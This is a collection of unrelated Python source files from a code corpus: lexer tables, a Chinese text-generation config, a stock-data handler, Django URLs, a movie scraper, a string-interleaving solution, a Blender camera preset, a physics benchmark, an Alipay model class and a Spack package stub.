_sedlex_DT_table_26 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 4, 1, 1, 1, 1, 1] _sedlex_rnd_211 = [_sedlex_rnd_207, _sedlex_rnd_208, _sedlex_rnd_209, _sedlex_rnd_210] _sedlex_rnd_206 = [_sedlex_rnd_205] _sedlex_rnd_204 = [_sedlex_rnd_202, _sedlex_rnd_203] _sedlex_rnd_201 = [_sedlex_rnd_200] _sedlex_DT_table_25 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_199 = [_sedlex_rnd_197, _sedlex_rnd_198] _sedlex_DT_table_24 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_196 = [_sedlex_rnd_194, _sedlex_rnd_195] _sedlex_rnd_193 = [_sedlex_rnd_191, _sedlex_rnd_192] _sedlex_DT_table_23 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_190 = [_sedlex_rnd_188, _sedlex_rnd_189] _sedlex_DT_table_22 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_187 = [_sedlex_rnd_184, _sedlex_rnd_185, _sedlex_rnd_186] _sedlex_rnd_183 = [_sedlex_rnd_182] _sedlex_DT_table_21 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_181 = [_sedlex_rnd_179, _sedlex_rnd_180] _sedlex_rnd_178 = [_sedlex_rnd_177] _sedlex_DT_table_20 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_176 = [_sedlex_rnd_174, _sedlex_rnd_175] _sedlex_DT_table_19 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_173 = [_sedlex_rnd_171, _sedlex_rnd_172] _sedlex_DT_table_18 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_170 = [_sedlex_rnd_168, _sedlex_rnd_169] _sedlex_DT_table_17 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_167 = [_sedlex_rnd_165, _sedlex_rnd_166] _sedlex_rnd_164 = [_sedlex_rnd_163] _sedlex_DT_table_16 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_162 = [_sedlex_rnd_160, _sedlex_rnd_161] _sedlex_DT_table_15 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_159 = [_sedlex_rnd_157, _sedlex_rnd_158] _sedlex_rnd_156 = [_sedlex_rnd_154, _sedlex_rnd_155] _sedlex_rnd_153 = [_sedlex_rnd_151, _sedlex_rnd_152] _sedlex_rnd_150 = [_sedlex_rnd_148, _sedlex_rnd_149] _sedlex_rnd_147 = [_sedlex_rnd_145, _sedlex_rnd_146] _sedlex_rnd_144 = [_sedlex_rnd_142, _sedlex_rnd_143] _sedlex_rnd_141 = [_sedlex_rnd_139, _sedlex_rnd_140] _sedlex_rnd_138 = [_sedlex_rnd_136, _sedlex_rnd_137] _sedlex_rnd_135 = [_sedlex_rnd_133, _sedlex_rnd_134] _sedlex_rnd_132 = [_sedlex_rnd_130, _sedlex_rnd_131] _sedlex_DT_table_14 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_129 = [_sedlex_rnd_126, _sedlex_rnd_127, _sedlex_rnd_128] _sedlex_DT_table_13 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_125 = [_sedlex_rnd_123, _sedlex_rnd_124] _sedlex_DT_table_12 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_122 = [_sedlex_rnd_120, _sedlex_rnd_121] _sedlex_DT_table_11 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_119 = [_sedlex_rnd_116, _sedlex_rnd_117, _sedlex_rnd_118] _sedlex_DT_table_10 = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2] _sedlex_rnd_115 = [_sedlex_rnd_113, _sedlex_rnd_114] _sedlex_rnd_112 = [_sedlex_rnd_111] _sedlex_DT_table_9 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_110 = [_sedlex_rnd_109] _sedlex_rnd_108 = [_sedlex_rnd_106, _sedlex_rnd_107] _sedlex_rnd_105 = [_sedlex_rnd_104] _sedlex_DT_table_8 = [1, 2] _sedlex_rnd_103 = [_sedlex_rnd_101, _sedlex_rnd_102] _sedlex_rnd_100 = [_sedlex_rnd_99] _sedlex_rnd_98 = [_sedlex_rnd_95, _sedlex_rnd_96, _sedlex_rnd_97] _sedlex_rnd_94 = [_sedlex_rnd_93] _sedlex_DT_table_7 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_92 = [_sedlex_rnd_91] _sedlex_DT_table_6 = [1, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3] _sedlex_rnd_90 = [_sedlex_rnd_87, _sedlex_rnd_88, 
_sedlex_rnd_89] _sedlex_rnd_86 = [_sedlex_rnd_85] _sedlex_rnd_84 = [_sedlex_rnd_83] _sedlex_DT_table_5 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2] _sedlex_rnd_82 = [_sedlex_rnd_80, _sedlex_rnd_81] _sedlex_rnd_79 = [_sedlex_rnd_78] _sedlex_DT_table_4 = [1, 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4] _sedlex_rnd_77 = [_sedlex_rnd_73, _sedlex_rnd_74, _sedlex_rnd_75, _sedlex_rnd_76] _sedlex_rnd_72 = [_sedlex_rnd_71] _sedlex_rnd_70 = [_sedlex_rnd_69] _sedlex_rnd_68 = [_sedlex_rnd_67] _sedlex_DT_table_3 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2] _sedlex_rnd_66 = [_sedlex_rnd_64, _sedlex_rnd_65] _sedlex_rnd_63 = [_sedlex_rnd_62] _sedlex_rnd_61 = [_sedlex_rnd_58, _sedlex_rnd_59, _sedlex_rnd_60] _sedlex_rnd_57 = [_sedlex_rnd_54, _sedlex_rnd_55, _sedlex_rnd_56] _sedlex_rnd_53 = [_sedlex_rnd_50, _sedlex_rnd_51, _sedlex_rnd_52] _sedlex_DT_table_2 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3] _sedlex_rnd_49 = [_sedlex_rnd_46, _sedlex_rnd_47, _sedlex_rnd_48] _sedlex_DT_table_1 = [1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 2, 2, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 2, 4, 5, 2, 6, 7, 2, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 17, 17, 17, 17, 17, 17, 17, 17, 18, 19, 20, 21, 22, 2, 2, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 23, 24, 2, 25, 26, 23, 2, 27, 28, 23, 29, 30, 31, 32, 23, 33, 23, 23, 34, 23, 35, 36, 23, 23, 37, 23, 38, 39, 23, 40, 23, 23, 23, 41, 42, 43, 44] _sedlex_rnd_45 = [_sedlex_rnd_1, _sedlex_rnd_2, _sedlex_rnd_3, _sedlex_rnd_4, _sedlex_rnd_5, _sedlex_rnd_6, _sedlex_rnd_7, _sedlex_rnd_8, _sedlex_rnd_9, _sedlex_rnd_10, _sedlex_rnd_11, _sedlex_rnd_12, _sedlex_rnd_13, _sedlex_rnd_14, _sedlex_rnd_15, _sedlex_rnd_16, _sedlex_rnd_17, _sedlex_rnd_18, _sedlex_rnd_19, _sedlex_rnd_20, _sedlex_rnd_21, _sedlex_rnd_22, _sedlex_rnd_23, _sedlex_rnd_24, _sedlex_rnd_25, _sedlex_rnd_26, _sedlex_rnd_27, _sedlex_rnd_28, _sedlex_rnd_29, _sedlex_rnd_30, _sedlex_rnd_31, _sedlex_rnd_32, _sedlex_rnd_33, _sedlex_rnd_34, _sedlex_rnd_35, _sedlex_rnd_36, _sedlex_rnd_37, _sedlex_rnd_38, _sedlex_rnd_39, _sedlex_rnd_40, _sedlex_rnd_41, _sedlex_rnd_42, _sedlex_rnd_43, _sedlex_rnd_44]
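# --- Added illustration (not part of the generated lexer) -------------------
# Every _sedlex_decide_N function above follows one shape: clamp the code
# point to a range, then index a dense lookup table whose entries are branch
# ids offset by one (0 in the table means "no transition", hence the trailing
# "- 1"). A minimal self-contained sketch of that dispatch, using a made-up
# table rather than one of the generated _sedlex_DT_table_N arrays:
_demo_table = [1, 2, 2, 1]  # hypothetical: offsets 0..3 -> branch id + 1

def _demo_decide(c: int) -> int:
    # mirror of the generated shape: out of range -> -1, else table lookup - 1
    if c <= -1:
        return -1
    elif c <= 3:
        return _demo_table[c - 0] - 1
    else:
        return -1

# _demo_decide(0) -> 0, _demo_decide(1) -> 1, _demo_decide(9) -> -1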
StarcoderdataPython
90684
<gh_stars>0
# coding=utf-8
import unicodedata


class Config(object):
    # Constructor. __init__() is the class initializer: it runs automatically
    # when the class is instantiated and never needs to be called by hand.
    def __init__(self):
        # Set attributes.
        self.stopwords = [" ", " ", " ", ",", ",", ".", "。", "、", "!", "!",
                          "?", "?", ";", ";", "~", "~", "·", "·", ".", "…",
                          "-", "#_", "—", "+", "=", "'", "\"", "‘", "’", "“",
                          "”", "*", "&", "^", "%", "$", "/", "\\", "@"]
        self.stopwords, self.map_e2z = self.addStopwords()
        self.blackwords = ['自杀', '死', '火葬', '我是你爸爸', '我是你妈妈']
        self.specialwords_pre = ['祝福', '祝愿', '预祝']
        self.specialwords_gen = ['生日', '新年', '新春', '春节', '节日', '元旦']
        self.singlewords = ['哈', '啊', '哦', '哦', '呵', '嘿', '哎', '哼']
        self.removed_words = ['⊙']
        self.punc_end = '.?!。?!》>'
        self.path_HighFreqWords = '../bin/data/words_highFreq.txt'
        self.HighFreqWords = self.getHFW()
        self.min_contenlen = 8
        self.rate_gen2inp = 1.4
        self.batchGenerating = True
        self.max_nb_sents = 4
        self.prefixTrim = True
        self.useThread = False
        self.fast_pattern = True

    def addStopwords(self):
        punc_zh = "!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟‧﹏.…"
        punc_en = unicodedata.normalize('NFKC', punc_zh[:-1]) + unicodedata.normalize('NFKC', punc_zh[-1])[-1]
        punc_zh = punc_zh + '。'
        punc_en = punc_en + '。'
        map_e2z = {punc_en[i]: punc_zh[i] for i in range(len(punc_en))}
        stopwords = self.stopwords + list(punc_zh) + list(punc_en)
        stopwords = list(set(stopwords))
        return stopwords, map_e2z

    def getHFW(self):
        with open(self.path_HighFreqWords, 'r') as f:
            s = f.read().strip().split('\n')
        return s
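
# Added illustration (standalone; avoids instantiating Config so the
# high-frequency-word file is not required): the NFKC normalization used in
# addStopwords maps full-width punctuation to its ASCII form, which is how
# map_e2z pairs the two alphabets.
_demo_zh = ",!?"
_demo_en = unicodedata.normalize('NFKC', _demo_zh)
assert _demo_en == ",!?"
_demo_map = {e: z for e, z in zip(_demo_en, _demo_zh)}  # ASCII -> full-width
assert _demo_map[','] == ","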
StarcoderdataPython
3211415
<filename>Handler/data_handler.py
import yaml
import types
import pandas as pd
from Handler.mongo_handler import MongoHandler
from Utils.utils import Log

yaml.warnings({'YAMLLoadWarning': False})

with open("config.yaml", "rt", encoding="utf-8") as stream:
    CONFIG = yaml.load(stream)['StockCrawler']


class DataHandler:
    def __init__(self):
        self.log = Log(DataHandler)
        self.mongo = MongoHandler()

        self.company_info = None
        self.company_list = None

        check_target_location = CONFIG['company_name_location']
        if check_target_location == 'DB':
            self.get_target_company = types.MethodType(self._get_company_by_mongo, self)
        elif check_target_location == 'File':
            self.get_target_company = types.MethodType(self._get_company_by_file, self)

    def get_target_company(self):
        pass

    def save_stock_data(self, stock_df):
        self.mongo.update_stock_data(stock_df)

    def _get_company_by_mongo(self, obj):
        self.log.debug("Get company information by database(MongoDB)")
        self.company_info = pd.DataFrame(self.mongo.get_company())
        self.company_list = self.company_info[['company', 'code']]

    def _get_company_by_file(self, obj):
        pass
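
# Added illustration (standalone sketch, simplified from the dispatch above):
# types.MethodType binds a plain function to an instance at runtime, so
# __init__ can pick the data source once instead of branching on every call.
# Note the class above passes an already-bound method plus self, which also
# works but feeds the instance in twice; the minimal form looks like this:
import types as _types

class _DispatchDemo:
    def __init__(self, mode):
        impl = _DispatchDemo._from_db if mode == 'DB' else _DispatchDemo._from_file
        self.load = _types.MethodType(impl, self)

    def _from_db(self):
        return 'db'

    def _from_file(self):
        return 'file'

# _DispatchDemo('DB').load() -> 'db'; _DispatchDemo('File').load() -> 'file'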
StarcoderdataPython
1622341
<filename>src/tandlr/urls.py
# -*- coding: utf-8 -*-
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView

from tandlr.registration.views import confirm

admin.autodiscover()

"""
API REST VERSION v1
"""

urlpatterns = [
    url(
        r'^api/',
        include(
            'tandlr.api.urls',
            namespace='api'
        )
    ),
    url(r'^confirm/(?P<activation_key>\w+)/$',
        confirm,
        name='registration_confirm'),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^admin_tools/', include('admin_tools.urls')),
] + static(
    settings.MEDIA_URL,
    document_root=settings.MEDIA_ROOT
)

if 'tandlr.emails' in settings.INSTALLED_APPS and settings.TEMPLATE_DEBUG:
    urlpatterns = urlpatterns + patterns(
        '',
        url(r'^email-preview/',
            include('tandlr.emails.urls', namespace='emails'))
    )

if True:
    # This URL exists only to test the sockets. Remove it once the sockets
    # are wired into the frontend.
    urlpatterns += [
        url(
            r'^notifications$',
            TemplateView.as_view(
                template_name="notifications/test_sockets.html"
            ),
            name='notifications_example'
        ),
    ]
StarcoderdataPython
1624103
import requests
from bs4 import BeautifulSoup
import csv

# Open the output CSV and write the header row.
file = open('movie.csv', mode='w', newline='')
writer = csv.writer(file)
writer.writerow(["title", "img_src"])

MOVIE_URL = 'https://movie.naver.com/movie/running/current.nhn'
movie_html = requests.get(MOVIE_URL)
movie_soup = BeautifulSoup(movie_html.text, "html.parser")

# Each currently-running movie is an <li> inside the detail list.
movie_list_box = movie_soup.find("ul", {"class": "lst_detail_t1"})
movie_list = movie_list_box.find_all('li')

final_result = []
for movie in movie_list:
    title = movie.find("dt", {"class": "tit"}).find("a").text
    img_src = movie.find("div", {"class": "thumb"}).find("img")['src']
    movie_info = {
        'title': title,
        'img_src': img_src
    }
    final_result.append(movie_info)

for result in final_result:
    row = [result['title'], result['img_src']]
    writer.writerow(row)

file.close()  # flush and close so all rows actually reach disk
print(final_result)
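
# Added check (illustrative): read the CSV written above back with the stdlib
# csv module to confirm the header and row count.
with open('movie.csv', newline='') as f:
    reader = csv.reader(f)
    header = next(reader)          # ["title", "img_src"]
    rows = list(reader)
print('wrote', len(rows), 'movies with columns', header)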
StarcoderdataPython
1770489
class Solution:
    def isInterleave(self, s1: str, s2: str, s3: str) -> bool:
        len1 = len(s1)
        len2 = len(s2)
        len3 = len(s3)
        if len1 + len2 != len3:
            return False
        # dp[i][j] is True when s3[:i + j] is an interleaving of s1[:i] and s2[:j].
        dp = [[False] * (len2 + 1) for i in range(len1 + 1)]
        dp[0][0] = True
        # First column: s3 built from s1 alone.
        for i in range(1, len1 + 1):
            dp[i][0] = (dp[i - 1][0] and s1[i - 1] == s3[i - 1])
        # First row: s3 built from s2 alone.
        for i in range(1, len2 + 1):
            dp[0][i] = (dp[0][i - 1] and s2[i - 1] == s3[i - 1])
        # Interior: the next character of s3 either extends a match from the
        # left (taken from s2) or from above (taken from s1).
        for i in range(1, len1 + 1):
            for j in range(1, len2 + 1):
                dp[i][j] = (dp[i][j - 1] and s2[j - 1] == s3[i + j - 1]) or (
                    dp[i - 1][j] and s1[i - 1] == s3[i + j - 1])
        return dp[-1][-1]


s1 = "aabcc"
s2 = "dbbca"
s3 = "aadbbcbcac"
interleave = Solution().isInterleave(s1, s2, s3)
print(interleave)  # True
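
# Added variant (illustrative, not in the original): the same DP rolled into a
# single row for O(len(s2)) space. Before each update, dp[j] still holds the
# previous row's value and dp[j - 1] the current row's, so the recurrence is
# unchanged; behavior matches isInterleave above.
def is_interleave_1d(s1: str, s2: str, s3: str) -> bool:
    if len(s1) + len(s2) != len(s3):
        return False
    dp = [False] * (len(s2) + 1)
    dp[0] = True
    for j in range(1, len(s2) + 1):
        dp[j] = dp[j - 1] and s2[j - 1] == s3[j - 1]
    for i in range(1, len(s1) + 1):
        dp[0] = dp[0] and s1[i - 1] == s3[i - 1]
        for j in range(1, len(s2) + 1):
            dp[j] = (dp[j] and s1[i - 1] == s3[i + j - 1]) or (
                dp[j - 1] and s2[j - 1] == s3[i + j - 1])
    return dp[-1]

# is_interleave_1d("aabcc", "dbbca", "aadbbcbcac") -> True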
StarcoderdataPython
164967
<filename>release/scripts/presets/camera/GoPro_Hero3_Black.py
import bpy

bpy.context.camera.sensor_width = 6.16
bpy.context.camera.sensor_height = 4.62
bpy.context.camera.lens = 2.77
bpy.context.camera.sensor_fit = 'AUTO'
StarcoderdataPython
1676390
<reponame>slamavl/quantarhei<filename>quantarhei/wizard/benchmarks/bm_001.py
# -*- coding: utf-8 -*-

import quantarhei as qr


def main():

    with qr.energy_units("1/cm"):
        mol1 = qr.Molecule([0.0, 12000.0])
        mol2 = qr.Molecule([0.0, 12100.0])
        mol3 = qr.Molecule([0.0, 12100.0])

        agg = qr.Aggregate([mol1, mol2, mol3])

        m1 = qr.Mode(100)
        mol1.add_Mode(m1)
        m2 = qr.Mode(100)
        mol2.add_Mode(m2)
        m3 = qr.Mode(100)
        mol3.add_Mode(m3)

        agg.build(mult=1)

        print(agg.Ntot)
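
# Added for standalone runs (an assumption: the quantarhei wizard may also
# invoke main() itself when this benchmark is selected):
if __name__ == "__main__":
    main()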
StarcoderdataPython
4808273
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json

from alipay.aop.api.constant.ParamConstants import *


class PickUpInfo(object):

    def __init__(self):
        self._pick_up_address = None
        self._pick_up_code = None
        self._pick_up_shop_name = None
        self._pick_up_type = None
        self._table_num = None

    @property
    def pick_up_address(self):
        return self._pick_up_address

    @pick_up_address.setter
    def pick_up_address(self, value):
        self._pick_up_address = value

    @property
    def pick_up_code(self):
        return self._pick_up_code

    @pick_up_code.setter
    def pick_up_code(self, value):
        self._pick_up_code = value

    @property
    def pick_up_shop_name(self):
        return self._pick_up_shop_name

    @pick_up_shop_name.setter
    def pick_up_shop_name(self, value):
        self._pick_up_shop_name = value

    @property
    def pick_up_type(self):
        return self._pick_up_type

    @pick_up_type.setter
    def pick_up_type(self, value):
        self._pick_up_type = value

    @property
    def table_num(self):
        return self._table_num

    @table_num.setter
    def table_num(self, value):
        self._table_num = value

    def to_alipay_dict(self):
        params = dict()
        if self.pick_up_address:
            if hasattr(self.pick_up_address, 'to_alipay_dict'):
                params['pick_up_address'] = self.pick_up_address.to_alipay_dict()
            else:
                params['pick_up_address'] = self.pick_up_address
        if self.pick_up_code:
            if hasattr(self.pick_up_code, 'to_alipay_dict'):
                params['pick_up_code'] = self.pick_up_code.to_alipay_dict()
            else:
                params['pick_up_code'] = self.pick_up_code
        if self.pick_up_shop_name:
            if hasattr(self.pick_up_shop_name, 'to_alipay_dict'):
                params['pick_up_shop_name'] = self.pick_up_shop_name.to_alipay_dict()
            else:
                params['pick_up_shop_name'] = self.pick_up_shop_name
        if self.pick_up_type:
            if hasattr(self.pick_up_type, 'to_alipay_dict'):
                params['pick_up_type'] = self.pick_up_type.to_alipay_dict()
            else:
                params['pick_up_type'] = self.pick_up_type
        if self.table_num:
            if hasattr(self.table_num, 'to_alipay_dict'):
                params['table_num'] = self.table_num.to_alipay_dict()
            else:
                params['table_num'] = self.table_num
        return params

    @staticmethod
    def from_alipay_dict(d):
        if not d:
            return None
        o = PickUpInfo()
        if 'pick_up_address' in d:
            o.pick_up_address = d['pick_up_address']
        if 'pick_up_code' in d:
            o.pick_up_code = d['pick_up_code']
        if 'pick_up_shop_name' in d:
            o.pick_up_shop_name = d['pick_up_shop_name']
        if 'pick_up_type' in d:
            o.pick_up_type = d['pick_up_type']
        if 'table_num' in d:
            o.table_num = d['table_num']
        return o
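
# Added round-trip sketch (illustrative; the field values are made up):
# from_alipay_dict and to_alipay_dict invert each other for plain values,
# since to_alipay_dict only emits the fields that are actually set.
if __name__ == '__main__':
    payload = {
        'pick_up_address': 'No. 1 Example Road',
        'pick_up_code': 'A-42',
        'pick_up_type': 'IN_STORE',
    }
    info = PickUpInfo.from_alipay_dict(payload)
    assert info.to_alipay_dict() == payload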
StarcoderdataPython
1748950
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)

from spack import *


class Tassel(Package):
    """TASSEL is a software package to evaluate traits associations,
    evolutionary patterns, and linkage disequilibrium."""

